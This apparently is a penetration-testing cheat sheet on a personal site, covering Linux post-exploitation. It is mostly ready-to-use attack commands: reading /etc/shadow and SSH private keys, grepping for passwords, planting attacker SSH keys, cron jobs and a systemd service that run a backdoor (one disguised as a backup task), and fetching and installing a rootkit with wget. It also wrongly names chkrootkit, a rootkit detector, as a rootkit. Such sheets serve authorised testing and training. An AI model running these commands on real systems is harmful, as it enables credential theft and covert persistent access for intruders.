Initializing VAULT-TEC OS...
Loading security protocols...
Establishing secure connection...
Connection established.
SYSTEM READY

Vault-Tec Terminal

ABOUT POSTS NOTES TOOLS

CheatSheets

CURL DNS File Transfer Hydra Impacket JohnTheRipper NCAT NMAP Online Resources Reverse Shell Wordlists

Active Directory

Mindmap Attacking AD Linux AD

Cloud

AWS Azure Google Terraform

Container

Docker Kubernetes

Linux

Penetration Testing Checklist Enumeration Privilege Escalation Post Exploitation Services Tools

Network

Data Exfiltration Port Scanning Reconnaissance Pivoting Services Traffic Analysis

Tech Stack

CMS Databases DevOps Enterprise Apps IAM Monitoring Open-Source Utilities Web Servers

Windows

AV/EDR Evasion Enumeration Privilege Escalation Post Exploitation

Web Application

Reconnaissance Common Vulnerabilities Authentication Bypass API Testing

Linux Post Exploitation

Data Collection

Sensitive Files

# Common locations
/etc/shadow
/etc/passwd
/etc/ssh/ssh_host_*
/home/*/.ssh/id_*
/root/.ssh/id_*

# Find additional sensitive files
find / -name "*.pem" 2>/dev/null
grep -r "password" / 2>/dev/null
cat /var/www/html/config.php
cat /etc/nginx/nginx.conf
cat /etc/apache2/sites-enabled/*

Network Information

# Gather network data
ip neighbor
route -n
cat /etc/hosts
cat /etc/resolv.conf

# External network mapping
nmap -sn <network>

# Check DNS for pivoting
dig <domain>

Process Information

ps auxf
pstree -a
lsof -i

# Check scheduled tasks
crontab -l
cat /etc/cron.*
cat /etc/cron.d/*

# Real-time process monitoring
pspy64: `./pspy64`

Persistence Techniques

# Generate SSH key
ssh-keygen -t rsa -b 4096

# Copy public key
echo "your_public_key" >> /root/.ssh/authorized_keys
echo "your_public_key" >> /home/user/.ssh/authorized_keys

# Modify SSH config
echo "AllowUsers yourusername" >> /etc/ssh/sshd_config
ssh-copy-id user@target

Cron Jobs

# Add persistent cron job
echo "* * * * * /path/to/backdoor" >> /var/spool/cron/crontabs/root

# Mask cron job as legit task
echo "0 0 * * * /usr/bin/backup.sh" >> /etc/cron.daily/backup

# Verify cron jobs
crontab -u root -l

Service Creation

# Create systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service

[Service]
ExecStart=/path/to/backdoor

[Install]
WantedBy=multi-user.target
EOF

# Enable and start service
systemctl enable backdoor.service
systemctl start backdoor.service

# Check service status
systemctl status backdoor.service

Rootkit Installation

# Install simple rootkit (example: chkrootkit or knark)
wget <rootkit_url> -O rootkit.tar.gz
tar -xzf rootkit.tar.gz
cd rootkit
make install

Environmental Variables

# Add persistent environment variable
echo "export PATH=$PATH:/path/to/backdoor" >> /root/.bashrc